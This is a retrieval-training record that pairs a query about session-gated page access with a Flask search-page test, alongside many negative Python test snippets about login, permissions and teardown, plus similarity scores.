super(TestCase, self).tearDown()\n self._context.check_done()", "def pytest_finished_handling_group(session, worker):", "def after(self):\n pass", "def after(self):\n pass", "def do_after(self):\r\n pass", "def teardown(self) -> None:", "def teardown(self) -> None:", "def teardown(self) -> None:", "def eof(self):\n self.report_scenario_completed()\n self.report_feature_completed()\n self.report_failures()\n self.stream.flush()\n self.reset()", "def teardown(self):", "def teardown(self):", "def teardown(self):", "def finish():\n pass", "def done(self):\n log.debug(\"Test run concluded\")\n if self._startTime is not None:\n self.report['startTime'] = self._startTime\n self.report['runTime'] = time.time() - self._startTime\n self.report['testsRun'] = self.testsRun\n self.report['tests'] = self._tests\n self.writeReport()", "def tearDown(self):\n self.logger.info(\"tearDown begin\")\n self.logger.info(\"tearDown end\\n\")", "def finish(self):\n pass", "def finish(self):\n pass", "def _end(self):\n\n self.logger.msg1(\"Done\")", "def Finish(self):\n pass", "def done(self):", "def done(self):", "def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)", "def finish():", "def finish():", "def finish():", "def finish():", "def teardown_method(self):\n world.clear_paths()\n print(\"\\nEnd of tests in: %s\\n-------------------\\n\" % __name__)\n self.bigml = {}", "def finished_tests(self):\n self.testing = 0\n if not self.closing:\n self.enable_menus(1)\n self.parent.finished_tests()", "def teardown(self):\n pass", "def teardown(self):\n pass", "def teardown(self):\n pass", "def end(self):\n ...", "def tearDown(self):\n print('Calling \\'tearDown\\'')", "def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')", "def teardown(self):\n pass # pylint: disable=unnecessary-pass", "def finish(self) -> None:", "def finish(self) -> None:", "def after(self) -> None:\n pass", "def afterWork(self):\n pass", "def teardown(self) -> None:\n pass", "def teardown(self) -> None:\n pass", "def finished(self):\n\t\telog(\"finished\")", "def finish(self):", "def finish(self):", "def teardown(self, rc):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n 
callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def teardown(self):\n self.tcex.log.trace('teardown')", "def tearDown(self):\n\t\tpass", "def tearDown(self):\r\n self.app.application_close(self.util.client, self.app_name)\r\n\r\n self.common.generate_report(self.util.client, False)\r\n # Releases the client so that other clients can approach the agent in the near future.\r\n self.common.release_client(self.util.client)\r\n self.logger.info(\"==============Results=================\")\r\n self.logger.info(\"Number of Strings verified: \" + str(len(Config.results_list)/2))\r\n for i in range(0, len(Config.results_list), 2):\r\n self.logger.info(str(Config.results_list[i]) + \"{:>36}\".format('=====> ')\r\n + str(Config.results_list[i+1]))\r\n self.logger.info(\"Testcase tear-down: COMPLETED\")", "def _teardown(self):\n # No-op base implementation", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n self.teardown_beets()", "def tearDown(self):\n pass #because we dont have anything to tearDown.", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def end(self) -> None:", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def test_teardown(self):\n assert self.search_behaviour.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self):\r\n testing.tearDown()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def test_teardown(self):\n assert self.http_handler.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self) -> None:\n\n logging.info(f\"{'=' * 20}Test completed!{'=' * 20}\")\n logging.info(\"Failed to execute the following parameter combinations: \")\n if self.error_params:\n for each in self.error_params:\n logging.info(each)", "def complete_run():\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass" ]
[ "0.7842646", "0.7775997", "0.77741504", "0.77669877", "0.76620615", "0.7591832", "0.74713165", "0.7361014", "0.73159444", "0.7298099", "0.72939897", "0.72939897", "0.7259042", "0.723601", "0.72323287", "0.7225132", "0.7225132", "0.72186595", "0.720453", "0.720453", "0.720453", "0.71972543", "0.7169602", "0.7169602", "0.7169602", "0.7156569", "0.71476275", "0.71394765", "0.7076665", "0.7076665", "0.7069562", "0.7041864", "0.703863", "0.703863", "0.7033583", "0.70185405", "0.70185405", "0.70185405", "0.70185405", "0.700787", "0.7004232", "0.69977206", "0.69977206", "0.69977206", "0.6989269", "0.69696915", "0.6961437", "0.69561034", "0.6955026", "0.6955026", "0.6953118", "0.69132566", "0.69062877", "0.69062877", "0.68875617", "0.6877217", "0.6877217", "0.68729943", "0.6852672", "0.6852672", "0.6852672", "0.68484807", "0.68444866", "0.68266255", "0.68266255", "0.68266255", "0.6826606", "0.6801074", "0.6786863", "0.67829174", "0.6780355", "0.6780355", "0.6780355", "0.6780355", "0.6780355", "0.67755795", "0.6770378", "0.6770378", "0.6770378", "0.6770378", "0.67644274", "0.67644274", "0.67644274", "0.67625135", "0.67589056", "0.6756688", "0.6751851", "0.67496306", "0.67349356", "0.6733076", "0.673071", "0.67240155", "0.6721047", "0.671874", "0.671278", "0.67090124", "0.6698873", "0.6698873", "0.6698873", "0.6698873", "0.6698873" ]
0.0
-1
Test this page can only be reached if user is in session
def test_user_profile_page(self):
    result = self.client.get("/profile", follow_redirects=True)
    self.assertIn(b"User ID", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_session_not_accessed(self):\n response = self.client.get(\"/auth_processor_no_attr_access/\")\n self.assertContains(response, \"Session not accessed\")", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_in(self):\n response = self.c.get(reverse(submit_point), {'lat': 34.0, 'lng': 45.3, 'zoom': 13})\n self.assertEqual(response.status_code, 403)", "def __before__(self):\n \n if not u'REMOTE_USER' in session: \n if not request.environ[u'PATH_INFO'] in self.public_urls:\n log.debug('PATH_INFO: %s' % request.environ[u'PATH_INFO'])\n #session[u'path_before_login'] = request.environ[u'PATH_INFO']\n #session.save()\n redirect(url('/users/index'))", "def test_professor_can_login_to_web_portal(professor):", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def test_session_is_accessed(self):\n response = self.client.get(\"/auth_processor_attr_access/\")\n self.assertContains(response, \"Session accessed\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_logged_in(self):\n response = self.c.get(reverse(map_page), {'lat': 34.0, 'lng': 45.3})\n self.assertEqual(response.status_code, 200)", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def test_login_required(self):\n self.client.logout()\n response = self.client.post(self.get_url(), {})\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def assert_accessible(self, url):\n try:\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.login()\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.logout()\n except Exception as exc: # pragma: no cover\n exc.args += ((url),)\n raise", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def _check_session_valid(request):\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = 
True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def test_session_state_for_unused_flash(self):\n self.response = self.client.get(reverse(views.render_template))\n self.assertFalse(_SESSION_KEY in self.client.session)", "def test_unauthenticated(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_user_not_authorized(self):\n response = self.client.post(self.url)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_04_admin_featured_apps_as_anonymous(self):\r\n res = self.app.get('/admin/featured', follow_redirects=True)\r\n assert \"Please sign in to access this page\" in res.data, res.data", "def test_category_view_not_logged_in(testapp):\n from webtest.app import AppError\n with pytest.raises(AppError, message=\"403 Forbidden\"):\n testapp.get('/category/1')", "def test_admin_can_login_to_web_portal(admin):", "def is_logged_in():\n return 'user' in session", "def test_journal_route_accessible_only_if_logged_in(self):\n response = self.client.get(reverse_lazy('journal'))\n self.assertEqual(response.status_code, 302)", "def user_in_session():\n return 'user_id' in login_session", "def test_func(self):\n return self.request.user.is_superuser", "def test_dashboard_not_signed(self):\n views_url = ('/dashboard/',\n '/accounts/picture/')\n #create a get request\n for view in views_url:\n response = self.client.get(view)\n #the user was not logged in, the user should be redirected\n self.assertEqual(response.status_code, 302,\n msg=str(response.request))", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n utils.test_can_access(self, self.url)", "def test_anonymous(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_not_logged_in(self):\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n AnonymousUser(), album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n AnonymousUser(), album.display_photo, ALBUM_PUBLIC)", "def test_func(self):\n return self.request.user.has_permission(\"core.view_staffer\")", "def 
test_signin_page_bypass(self):\r\n # Test that they do signin if they don't have a cert\r\n response = self.client.get(reverse('signin_user'))\r\n self.assertEqual(200, response.status_code)\r\n self.assertTrue('login_form' in response.content\r\n or 'login-form' in response.content)\r\n\r\n # And get directly logged in otherwise\r\n response = self.client.get(\r\n reverse('signin_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_authentication_is_not_required(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_allowed_to_submit(request):\n return not settings.REQUIRE_LOGIN or request.user.is_authenticated()", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def assert_cannot_view(obj):\n selenium_utils.open_url(obj.url)\n assert ui_utils.is_error_403()", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def test_private_pages_auth(self):\r\n auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # These are pages that should just load when the user is logged in\r\n # (no data needed)\r\n simple_auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # need an activated user\r\n self.test_create_account()\r\n\r\n # Create a new session\r\n self.client = AjaxEnabledTestClient()\r\n\r\n # Not logged in. 
Should redirect to login.\r\n print('Not logged in')\r\n for page in auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=302)\r\n\r\n # Logged in should work.\r\n self.login(self.email, self.pw)\r\n\r\n print('Logged in')\r\n for page in simple_auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=200)", "def test_registration_page_bypass(self):\r\n response = self.client.get(\r\n reverse('register_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_homepage_logged_in_except(self):\r\n\r\n u1 = User.query.filter_by(username='testuser').one()\r\n u1.location = 'US-FAKE'\r\n db.session.add(u1)\r\n db.session.commit()\r\n\r\n with self.client as c:\r\n with c.session_transaction() as sess:\r\n sess[CURR_USER_KEY] = u1.id\r\n response = c.get('/')\r\n self.assertEqual(response.status_code, 200)\r\n self.assertIn(b'No data found for your region.', response.data)", "def test_shred_login():\n assert_redirect_to_login('/shred/')\n assert_not_redirect_to_login('/shred/')", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_instructor_page_access_nonstaff(self):\r\n self.login(self.enrolled_user)\r\n\r\n urls = [reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()}),\r\n reverse('instructor_dashboard', kwargs={'course_id': self.test_course.id.to_deprecated_string()})]\r\n\r\n # Shouldn't be able to get to the instructor pages\r\n for url in urls:\r\n check_for_get_code(self, 404, url)", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def test_get_main_page_without_logged_in_user(self):\n response = self.testapp.get('/')\n self.assertEqual(response.status_int, 200)", "def test_aio_can_login_to_web_portal(aio):", "def before_request() -> None:\n if current_user.is_anonymous() or not current_user.is_allowed():\n abort(401)", "def test_func(self):\n return self.request.user.is_active # any active user", "def test_page_view_permission(self):\n \n adminonlypage = create_page_in_admin(self.testproject,\"adminonlypage\",\n permission_lvl=Page.ADMIN_ONLY) \n registeredonlypage = create_page_in_admin(self.testproject,\"registeredonlypage\",\n permission_lvl=Page.REGISTERED_ONLY)\n publicpage = create_page_in_admin(self.testproject,\"publicpage\",\n 
permission_lvl=Page.ALL)\n \n self._test_page_can_be_viewed(self.projectadmin,adminonlypage)\n self._test_page_can_not_be_viewed(self.participant,adminonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,adminonlypage) \n self._test_page_can_not_be_viewed(None,adminonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,registeredonlypage)\n self._test_page_can_be_viewed(self.participant,registeredonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,registeredonlypage)\n self._test_page_can_not_be_viewed(None,registeredonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,publicpage)\n self._test_page_can_be_viewed(self.participant,publicpage)\n self._test_page_can_be_viewed(self.registered_user,publicpage)\n self._test_page_can_be_viewed(None,publicpage) # None = not logged in", "def logged_in(request):\n return request.current_user is not None", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_not_logged_cannot_create_tab(self):\n\n utils.test_not_logged_cannot_access(self, self.url, self.data)", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to anonymous users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to authenticated users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n res = self.signin(email=self.root_addr, password=self.root_password)\r\n print res.data\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def deny_access():\n flash('You must login first.')\n return redirect(url_for('home'))", "def test_logged_in_not_friend(self):\n\n # log in\n self.make_logged_in_not_friend()\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n self.u2, album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n self.u2, album.display_photo, ALBUM_PUBLIC)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def 
test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_logged_in(session):\n return 'user' in session", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to anonymous users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to authenticated users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def test_if_an_user_c_access_administration_panel(client):\n response = client.get(\"/admin/\")\n assert response.status_code != 200", "def testDenyAllowAccess(self):\n self.host.ContinueAuth()\n self.host.SignIn(self.account['username'], self.account['password'])\n self.host.DenyAccess()\n self.host.ContinueAuth()\n self.host.AllowAccess()", "def test_no_redirect(self):\n self.create_user_and_login(\n agreed_to_terms_of_service=True,\n filled_out=True\n )\n\n resp = self.client.get(DASHBOARD_URL)\n assert resp.status_code == 200", "def __require_privilaged_access(self):\n if not self.getLoggedInUser():\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"The server must be start by using privilaged access to \"\n \"execute this action.\")", "def test_assessor_access_limited(self):\n assessor = get_or_create_default_assessor()\n self.client.login(assessor.email)\n # This assessor doesn't belong to a group\n self.assertTrue(is_assessor(assessor))\n self.assertFalse(get_user_assessor_groups(assessor))\n\n # forbidden\n urls_get_forbidden = [\n reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n reverse('wl_applications:enter_conditions_assessor', args=[self.application.pk, self.assessment.pk]),\n ]\n urls_post_forbidden = [\n {\n 'url': reverse('wl_applications:create_condition', args=[self.application.pk]),\n 'data': {\n 'code': '123488374',\n 'text': 'condition text'\n }\n },\n {\n 'url': 
reverse('wl_applications:set_assessment_condition_state'),\n 'data': {\n 'assessmentConditionID': self.assessment_condition.pk,\n 'acceptanceStatus': 'accepted',\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions_assessor',\n args=[self.application.pk, self.assessment.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n ]\n # Allowed\n urls_get_allowed = [\n reverse('wl_applications:search_conditions')\n ]\n urls_post_allowed = [\n ]\n for url in urls_get_forbidden:\n response = self.client.get(url, follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_post_forbidden:\n response = self.client.post(url['url'], url['data'], follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_get_allowed:\n response = self.client.get(url, follow=True)\n self.assertEqual(200, response.status_code)\n\n for url in urls_post_allowed:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEqual(200, response.status_code)", "def test_no_access_without_login(self):\n response = self.client.get(reverse('question_list'), follow=True)\n expected_url = reverse('home') + \"?next=\" + reverse('question_list')\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)\n expected_url = reverse('home') + \"?next=\" + reverse('question_add')\n response = self.client.get(reverse('question_add'), follow=True)\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)", "def test_webdriver_not_authenticated(live_server, env_browser):\n browser = env_browser\n browser.get(flask.url_for(\"security.change_password\", _external=True))\n assert flask.url_for(\"security.login\", _external=True) in browser.current_url", "def test_login_required(self):\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_not_logged_user_cannot_leave(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_login_required():\n pass", "def session_required(view):\n def validation(*args, **kwargs):\n request = args[0]\n if request.session.get('email', None):\n return view(*args, **kwargs)\n else:\n return HttpResponseForbidden('403 Forbbiden, You have to login first to use this amazing app')\n return validation", "def is_impersonated_session(request):\n return (\n hasattr(request, \"session\") and la_settings.USER_SESSION_FLAG in request.session\n )", "def test_not_logged_cannot_delete(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_authenticated(self):\n response = self.client.get(telemetry_url)\n self.assertEqual(403, response.status_code)", "def test_00_anonymous(self):\r\n res = self.app.get(self.url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"The CKAN exporter should not be available for anon users\"\r\n assert dom.find(id=\"ckan\") is None, err_msg", "def test_token(self):\n api_response = requests.get(self.api_config.get_api_url() + \"greetings/isloggedin\",\n headers={\"Authorization\": \"Bearer \" + self.API_TOKEN})\n\n if api_response.status_code == 401 or 403:\n return False\n else:\n return 
True", "def test_anonymous_user(self):\r\n self.request.user = AnonymousUser()\r\n context = user_has_cart_context_processor(self.request)\r\n self.assertFalse(context['display_shopping_cart'])", "def test_auth_public_unowned(self):\n self.do_visible(True, 'pattieblack', True, tenant='froggy')", "def test_if_forbiden_for_authenticated_permissions(self):\r\n res = self.client_authenticated.get(reverse(LIST_USER_URL),data={})\r\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)" ]
[ "0.7483035", "0.743996", "0.743996", "0.743996", "0.743996", "0.73823667", "0.7071074", "0.7004314", "0.7000037", "0.69217306", "0.6881494", "0.68084276", "0.68084276", "0.6783943", "0.67708766", "0.67426723", "0.6722217", "0.6721236", "0.6721236", "0.6721236", "0.6698859", "0.667831", "0.66518945", "0.66518945", "0.66518945", "0.66518945", "0.66455007", "0.66226435", "0.6596173", "0.65856487", "0.65641403", "0.65631926", "0.65609604", "0.65548426", "0.6545462", "0.6540188", "0.65247715", "0.65233016", "0.64949626", "0.6493033", "0.6479915", "0.6468787", "0.6463022", "0.64562196", "0.64526683", "0.6449491", "0.6449491", "0.6449491", "0.6449491", "0.6428942", "0.64245546", "0.6424506", "0.64243764", "0.64224505", "0.64174753", "0.6409176", "0.6408951", "0.6408951", "0.6408951", "0.6408951", "0.6408379", "0.6404869", "0.64023674", "0.6394072", "0.6379277", "0.6377155", "0.6374992", "0.6371757", "0.6366519", "0.6366092", "0.63619465", "0.6349594", "0.63396287", "0.6337581", "0.632101", "0.632101", "0.632101", "0.63083684", "0.63041055", "0.6302303", "0.6292932", "0.6283326", "0.6282739", "0.6281525", "0.6280755", "0.62749076", "0.6274882", "0.62743866", "0.62677187", "0.6254656", "0.625206", "0.624774", "0.6247272", "0.62447745", "0.6241966", "0.62295806", "0.62251514", "0.6221875", "0.62196773", "0.62184656", "0.62132096" ]
0.0
-1
Test this page can only be reached if user is in session
def test_search_page(self):
    result = self.client.get("/search")
    self.assertIn(b"Search", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_session_not_accessed(self):\n response = self.client.get(\"/auth_processor_no_attr_access/\")\n self.assertContains(response, \"Session not accessed\")", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_in(self):\n response = self.c.get(reverse(submit_point), {'lat': 34.0, 'lng': 45.3, 'zoom': 13})\n self.assertEqual(response.status_code, 403)", "def __before__(self):\n \n if not u'REMOTE_USER' in session: \n if not request.environ[u'PATH_INFO'] in self.public_urls:\n log.debug('PATH_INFO: %s' % request.environ[u'PATH_INFO'])\n #session[u'path_before_login'] = request.environ[u'PATH_INFO']\n #session.save()\n redirect(url('/users/index'))", "def test_professor_can_login_to_web_portal(professor):", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def test_session_is_accessed(self):\n response = self.client.get(\"/auth_processor_attr_access/\")\n self.assertContains(response, \"Session 